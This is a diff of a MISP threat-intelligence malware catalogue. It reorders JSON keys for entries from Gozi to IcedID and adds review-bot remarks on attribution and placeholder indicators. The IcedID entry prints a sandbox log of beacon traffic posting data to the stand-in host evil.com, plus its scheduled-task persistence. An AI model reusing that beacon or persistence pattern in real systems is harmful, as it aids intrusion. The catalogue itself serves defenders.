This version came with a webinject module.", "meta": { - "synonyms": [ - "CRM", - "Gozi CRM", - "Papras", - "Snifula", - "Ursnif" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", @@ -7313,16 +7309,22 @@ "https://www.secureworks.com/research/gozi", "https://lokalhost.pl/gozi_tree.txt", "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html" - ] + ], + "synonyms": [ + "CRM", + "Gozi CRM", + "Papras", + "Snifula", + "Ursnif" + ], + "type": [] }, "uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c", - "value": "Gozi", - "description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module." + "value": "Gozi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gpcode", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2", 
@@ -7330,182 +7332,180 @@ "https://de.securelist.com/analysis/59479/erpresser/", "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "127c3d76-6323-4363-93e0-cd06ade0dd52", - "value": "GPCode", - "description": "" + "value": "GPCode" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grabbot", "http://blog.fortinet.com/2017/03/17/grabbot-is-back-to-nab-your-data" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0092b005-b032-4e34-9c7e-7dd0e71a85fb", - "value": "GrabBot", - "description": "" + "value": "GrabBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor", "http://blog.talosintelligence.com/2017/09/graftor-but-i-never-asked-for-this.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "94b942e2-cc29-447b-97e2-e496cbf2aadf", - "value": "Graftor", - "description": "" + "value": "Graftor" }, { + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. 
Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { - "synonyms": [ - "FrameworkPOS", - "trinity" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" - ] + ], + "synonyms": [ + "FrameworkPOS", + "trinity" + ], + "type": [] }, "uuid": "f82f8d2c-695e-461a-bd4f-a7dc58531063", - "value": "Grateful POS", - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past." 
+ "value": "Grateful POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5de7bd7f-bbbc-4431-8fd2-a90d25f30fd8", - "value": "Gratem", - "description": "" + "value": "Gratem" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1de27925-f94c-462d-acb6-f75822e05ec4", - "value": "Gravity RAT", - "description": "" + "value": "Gravity RAT" }, { + "description": "", "meta": { - "synonyms": [ - "eoehttp" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.greenshaitan", "https://blog.cylance.com/spear-a-threat-actor-resurfaces" - ] + ], + "synonyms": [ + "eoehttp" + ], + "type": [] }, "uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17", - "value": "GreenShaitan", - "description": "" + "value": "GreenShaitan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", - "value": "GROK", - "description": "" + "value": "GROK" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gsecdump", "https://attack.mitre.org/wiki/Technique/T1003" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", - "value": "gsecdump", - "description": 
"" + "value": "gsecdump" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.h1n1", "https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3", - "value": "H1N1 Loader", - "description": "" + "value": "H1N1 Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hacksfase", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2713a763-33fa-45ce-8552-7dd12b6b8ecc", - "value": "Hacksfase", - "description": "" + "value": "Hacksfase" }, { + "description": "Py2Exe based tool as found on github.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hackspy", "https://github.com/ratty3697/HackSpy-Trojan-Exploit" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", - "value": "HackSpy", - "description": "Py2Exe based tool as found on github." + "value": "HackSpy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "454fc9f7-b328-451f-806c-68ff5bcd491e", - "value": "Hamweq", - "description": "" + "value": "Hamweq" }, { + "description": "", "meta": { - "synonyms": [ - "Chanitor" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", 
@@ -7517,59 +7517,59 @@ "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak" - ] + ], + "synonyms": [ + "Chanitor" + ], + "type": [] }, "uuid": "4166ab63-24b0-4448-92ea-21c8deef978d", - "value": "Hancitor", - "description": "" + "value": "Hancitor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.happy_locker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", - "value": "HappyLocker (HiddenTear?)", - "description": "" + "value": "HappyLocker (HiddenTear?)" }, { + "description": "", "meta": { - "synonyms": [ - "Piptea" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.harnig", "https://www.fireeye.com/blog/threat-research/2011/08/harnig-is-back.html", "https://www.fireeye.com/blog/threat-research/2011/03/a-retreating-army.html" - ] + ], + "synonyms": [ + "Piptea" + ], + "type": [] }, "uuid": "619b9665-dac2-47a8-bf7d-942809439c12", - "value": "Harnig", - "description": "" + "value": "Harnig" }, { + "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. 
Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", "https://www.f-secure.com/weblog/archives/00002718.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c04fc02e-f35a-44b6-a9b0-732bf2fc551a", - "value": "Havex RAT", - "description": "Havex is a remote access trojan (RAT) that was discovered in 2013 as part of a widespread espionage campaign targeting industrial control systems (ICS) used across numerous industries and attributed to a hacking group referred to as \"Dragonfly\" and \"Energetic Bear\". Havex is estimated to have impacted thousands of infrastructure sites, a majority of which were located in Europe and the United States. Within the energy sector, Havex specifically targeted energy grid operators, major electricity generation firms, petroleum pipeline operators, and industrial equipment providers. 
Havex also impacted organizations in the aviation, defense, pharmaceutical, and petrochemical industries.\r\n\r\nOnce installed, Havex scanned the infected system to locate any Supervisory Control and Data Acquisition (SCADA) or ICS devices on the network and sent the data back to command and control servers. To do so, the malware leveraged the Open Platform Communications (OPC) standard, which is a universal communication protocol used by ICS components across many industries that facilitates open connectivity and vendor equipment interoperability. Havex used the Distributed Component Object Model (DCOM) to connect to OPC servers inside of an ICS network and collect information such as CLSID, server name, Program ID, OPC version, vendor information, running state, group count, and server bandwidth.\r\n\r\nHavex was an intelligence-collection tool used for espionage and not for the disruption or destruction of industrial systems. However, the data collected by Havex would have aided efforts to design and develop attacks against specific targets or industries." + "value": "Havex RAT" }, { + "description": "", "meta": { - "synonyms": [ - "Predator Pain" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", 
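Review bot: The HappyLocker entry carries its attribution uncertainty inside the tag name itself, `"value": "HappyLocker (HiddenTear?)"`, so every tag or search keyed on the `value` inherits the question mark. The doubt belongs outside the name: `"value": "HappyLocker"` plus a sentence in the currently empty `description` such as `Possibly a HiddenTear derivative; attribution unconfirmed.`, and — if this cluster format supports a `related` list — a `similar` link to the HiddenTear entry (uuid `b96be762-56a0-4407-be04-fcba76c1ff29` later in this file). Renaming a `value` changes a tag string that existing MISP events may already carry, so it should travel with a version bump rather than a pure re-sort like this commit. The HawkEye Keylogger entry that begins at the end of this hunk continues into the next one.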
@@ -7578,344 +7578,344 @@ "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/" - ] + ], + "synonyms": [ + "Predator Pain" + ], + "type": [] }, "uuid": "31615066-dbff-4134-b467-d97a337b408b", - "value": "HawkEye Keylogger", - "description": "" + "value": "HawkEye Keylogger" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helauto", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", - "value": "Helauto", - "description": "" + "value": "Helauto" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "19d89300-ff97-4281-ac42-76542e744092", - "value": "Helminth", - "description": "" + "value": "Helminth" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": 
"bb07e153-2e51-4ce1-97a3-4ec8a936e625", - "value": "Heloag", - "description": "" + "value": "Heloag" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herbst", "https://blog.fortinet.com/2016/06/03/cooking-up-autumn-herbst-ransomware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ca8482d9-657b-49fe-8345-6ed962a9735a", - "value": "Herbst", - "description": "" + "value": "Herbst" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "9d4fc43c-28a1-45ea-ac2c-8d53bdce118b", - "value": "Heriplor", - "description": "" + "value": "Heriplor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30a230c1-b598-4d06-90ab-3254d6a626d8", - "value": "Hermes", - "description": "" + "value": "Hermes" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4d8da0af-cfd7-4990-b211-af0e9906eca0", - "value": "Hermes Ransomware", - "description": "" + "value": "Hermes Ransomware" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.herpes" - ] + ], + "synonyms": [], + "type": [] }, 
"uuid": "4734c5a4-e63b-4bb4-8c01-ab0c638a6c21", - "value": "HerpesBot", - "description": "" + "value": "HerpesBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hesperbot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2637315d-d31e-4b64-aa4b-2fc265b0a1a3", - "value": "HesperBot", - "description": "" + "value": "HesperBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", "https://github.com/goliate/hidden-tear", "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", "https://twitter.com/struppigel/status/950787783353884672" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", - "value": "HiddenTear", - "description": "" + "value": "HiddenTear" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", - "value": "HideDRV", - "description": "" + "value": "HideDRV" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", "https://www.recordedfuture.com/hidden-lynx-analysis/", "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "35fd4bd7-d510-40fd-b89c-8a1b10dbc3f1", - "value": "HiKit", - "description": "" + "value": "HiKit" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.himan", "https://www.checkpoint.com/threatcloud-central/downloads/check-point-himan-malware-analysis.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", - "value": "himan", - "description": "" + "value": "himan" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hi_zor_rat", "https://www.fidelissecurity.com/threatgeek/2016/01/introducing-hi-zor-rat" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "80987ce7-7eb7-4e55-95f8-5c7a9441acab", - "value": "Hi-Zor RAT", - "description": "" + "value": "Hi-Zor RAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", - "value": "HLUX", - "description": "" + "value": "HLUX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.homefry", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d", - "value": "homefry", - "description": "" + "value": "homefry" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htbot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "246f62ee-854a-45e9-8c57-34f1fb72762f", - "value": "HtBot", - "description": "" + "value": "HtBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htprat", "https://www.riskiq.com/blog/labs/htprat/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e8d1a1f3-3170-4562-9a18-cadf000e48d0", - "value": "htpRAT", - 
"description": "" + "value": "htpRAT" }, { + "description": "", "meta": { - "synonyms": [ - "HUC Packet Transmit Tool" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.htran", "https://blog.trendmicro.com/trendlabs-security-intelligence/in-depth-look-apt-attack-tools-of-the-trade/", "https://www.secureworks.com/research/htran" - ] + ], + "synonyms": [ + "HUC Packet Transmit Tool" + ], + "type": [] }, "uuid": "3fb18a77-91ef-4c68-a9a9-fa6bdbea38e8", - "value": "HTran", - "description": "" + "value": "HTran" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser", "https://www.threatconnect.com/blog/threatconnect-discovers-chinese-apt-activity-in-europe/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "79f93d04-f6c8-4705-9395-7f575a61e82f", - "value": "HttpBrowser", - "description": "" + "value": "HttpBrowser" }, { + "description": "", "meta": { - "synonyms": [ - "httpdr0pper" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpdropper", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html", "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/dissecting-operation-troy.pdf", "https://www.sans.org/reading-room/whitepapers/critical/tracing-lineage-darkseoul-36787" - ] + ], + "synonyms": [ + "httpdr0pper" + ], + "type": [] }, "uuid": "78336551-c18e-47ac-8bef-1c0c61c0e0a9", - "value": "httpdropper", - "description": "" + "value": "httpdropper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy", "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "339b3e7c-7a4a-4a1a-94b6-555f15a0b265", - "value": 
"http_troy", - "description": "" + "value": "http_troy" }, { + "description": "", "meta": { - "synonyms": [ - "houdini" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hworm", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-houdinis-magic-reappearance/?adbsc=social67221546&adbid=790972447373668352&adbpl=tw&adbpr=4487645412" - ] + ], + "synonyms": [ + "houdini" + ], + "type": [] }, "uuid": "94466a80-964f-467e-b4b3-0e1375174464", - "value": "Hworm", - "description": "" + "value": "Hworm" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro", "https://securelist.com/luckymouse-hits-national-data-center/86083/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5", - "value": "HyperBro", - "description": "" + "value": "HyperBro" }, { + "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. 
waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] 
[https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2", "meta": { - "synonyms": [ - "BokBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid", "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites", 
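Review bot: The IcedID `description` embeds a raw INetSim session transcript in which `evil.com` and `172.16.0.130` are the analyst's sandbox placeholders (the reply header reads `Server: INetSim HTTPs Server`), but the text never says so, and a consumer that scrapes hostnames and IPs out of galaxy descriptions would ingest them as IcedID C2 indicators. A one-line lead-in before the log, `Example captured in an INetSim sandbox; the host name and IP are lab placeholders, not real C2 infrastructure.`, closes that gap, and the transcript could be cut to the request line and the `posting.php?a=…&b=…` URL pattern, which is the detection-relevant part. The same description spells the trigger switch `/i` in the scheduled-task action and `/I` in the behavioural bullets; use one spelling or state that the comparison is case-insensitive, since an analyst reproducing the run needs to know. Separately, `Hermes` and `Hermes Ransomware` are two entries with empty descriptions that cite the same Proofpoint article, so it is unclear whether they are one family filed twice. The IcedID entry's `refs` and `synonyms` continue into the next hunk.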
@@ -7924,112 +7924,112 @@ "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html", "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/", "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/" - ] + ], + "synonyms": [ + "BokBot" + ], + "type": [] }, "uuid": "26f5afaf-0bd7-4741-91ab-917bdd837330", - "value": "IcedID", - "description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an 